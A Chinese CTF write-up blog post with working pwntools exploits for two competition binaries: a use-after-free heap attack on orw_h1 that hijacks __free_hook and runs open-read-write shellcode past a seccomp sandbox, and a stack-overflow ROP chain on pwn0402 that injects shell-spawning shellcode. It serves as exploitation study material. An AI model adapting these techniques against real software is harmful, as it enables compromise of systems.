the_Belt_and_Road_review

文章发布时间:

最后更新时间:

三个小时的理论+CTF,全打理论去了:(
一带一路初赛题目附件
orw_h1
checksec

1
2
3
4
5
6
7
└─$ checksec orw_h1
[*] '/Desktop/pwn/orw_h1'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

sandbox

1
2
3
4
5
6
7
8
9
str1k3@ubuntu:~/Desktop$ seccomp-tools dump '/var/run/vmblock-fuse/blockdir/fTF0Ly/orw_h1' 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x02 0xc000003e  if (A != ARCH_X86_64) goto 0004
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0005
 0004: 0x06 0x00 0x00 0x00000000  return KILL
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW

delete存在UAF

1
2
3
4
5
if ( v1 <= 0x1E && *((_QWORD *)&unk_202060 + (int)v1) )
{
  free(*((void **)&unk_202060 + (int)v1));
  puts("delete done.");
}

glibc2.27

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
from pwn import *
#from LibcSearcher import*
from ctypes import *
from struct import pack
from pwn import u64,p64

context(arch = 'amd64', os = 'linux', log_level = 'debug')

one_gadget=[0x4f2a5,0x4f302,0x10a2fc]

p = process('./orw_h1')
#p = remote('106.15.38.114', 32832)

elf = ELF('./orw_h1')
libc = ELF('libc-2.27.so')

def debug():
    gdb.attach(p)
    pause()

def add(size,idx):
    p.sendlineafter(b'>>',b'1')
    p.sendlineafter(b'description:',str(size))
    p.sendlineafter(b'Game description:',str(idx))

def delete(idx):
    p.sendlineafter(b'>>',b'2')
    p.sendlineafter(b'game index: ',str(idx))

def edit(idx1,idx2):
    p.sendlineafter(b'>>',b'3')
    p.sendlineafter(b'game index: ',str(idx1))
    p.sendlineafter(b'Game description:',str(idx2))

def show(idx):
    p.sendlineafter(b'>>',b'4')
    p.sendlineafter(b'game index: ',str(idx))

def exit():
    p.sendlineafter(b'>>',b'5')

#先泄露libc地址
add(0x80,'aaaa') #1dx0
add(0x130,'bbbb') #idx1
add(0x130,'bbbb')#idx2
for i in range(7):
  add(128)
for i in range(3, 10):
  delete(i)
delete(0)
show(0)

p.recv()
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) - 0x3ebca0

free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
setcontext = libc_base + libc.sym['setcontext'] + 53

success("libc base:%s", hex(libc_base))
success("setcontext_53:%s", hex(setcontext))
success("free_hook:%s", hex(free_hook))

#貌似gadgets找不齐,这里用官方wp的
#打free_hook,利用setcontext开辟给shellcode的内存空间
#来执行orw的shellcode

#pop_rax_ret = libc_base+0x0000000000043ae8
#pop_rdi_ret = libc_base+0x0000000000001193
#pop_rsi_ret = libc_base+0x0000000000023eea
#pop_rdx_ret = libc_base+0x0000000000001b96
#ret = libc_base+0x0000000000000909
#open1 = libc_base + libc.sym['open']
#read = libc_base + libc.sym['read']
#write = libc_base + libc.sym['write']
#alarm = libc_base + libc.sym['alarm']
#syscall = alarm+0x5
#flag_addr = heap_base+0x2000

newexe = free_hook & 0xffffffffff000

shellcode1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000

mov eax,0
syscall
jmp rsi
'''% newexe

#伪造setcontext
frame = SigreturnFrame()
framersp = free_hook+0x10
frame.rdi = newexe
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = libc.sym['mprotect']

#随意找的orw
shellcode2= asm('''
 push 0x67616c66
 mov rdi,rsp
 xor esi,esi
 push 2
 pop rax
 syscall
 mov rdi,rax
 mov rsi,rsp
 mov edx,0x100
 xor eax,eax
 syscall
 mov edi,1
 mov rsi,rsp
 push 1
 pop rax
 syscall
 ''')


delete(1)
edit(1, p64(free_hook))
add(0x130)
payload = p64(setcontext+53)+p64(free_hook+0x18)*2+asm(shellcode1)
add(0x130, payload)
edit(2, str(frame))
delete(2)
p.sendline(shellcode2)
p.interactive()

pwn0402
啥都没开

1
2
3
4
5
6
7
8
└─$ checksec pwn0402
[*] '/Desktop/pwn0402'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // edx
  int v4; // ecx
  int v5; // r8d
  int v6; // r9d
  char v8[132]; // [rsp+0h] [rbp-90h] BYREF
  int v9; // [rsp+84h] [rbp-Ch]
  int i; // [rsp+88h] [rbp-8h]
  int j; // [rsp+8Ch] [rbp-4h]

  init_0();
  printf((unsigned int)"secret: %p\n", (unsigned int)v8, v3, v4, v5, v6, v8[0]);
  length = read(0LL, v8, 296LL);//溢出
  i = 0;
  v9 = strlen(nosecurity_string);
  for ( i = 0; i < length; ++i )
  {
    for ( j = 0; j < v9; ++j )
    {
      if ( nosecurity_string[j] == v8[i] )
        exit(0LL);
    }
  }//检查,过滤了'CTctGFlagSNH/binsh'
  return 0;
}

根本不走检查:)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
#from LibcSearcher import*
from ctypes import *
from struct import pack
from pwn import u64,p64

context(arch = 'amd64', os = 'linux', log_level = 'debug')

p = process('./pwn0402')
main = 0x400A05

p.recvuntil('secret: ')
data = int(p.recvline(),16) #泄露溢出点位置
rdx_rsi = 0x0000000000442b89 # pop rdx ; pop rsi ; ret
pop_rdi = 0x00000000004016e6
gdb.attach(p,'b *0x0400ABF')
pause()

success("v8:%s", hex(data))


payload = b''.ljust(0x98,b'\x90')#溢出
payload += p64(rdx_rsi)
payload += p64(0x100) + p64(data + 200)#== read (0,data+200,0x100)
payload += p64(pop_rdi) 
payload += p64(0)
payload += p64(0x0412ECB) #call_read 
p.sendline(payload)

#gdb.attach(p)
#pause()
#现在调用read的rop链已经执行==现在再调用一次read
#把shellcode写进去,整个栈都是可执行的
p.sendline(p64(data+210)+b'\x90'*20+asm(shellcraft.sh()))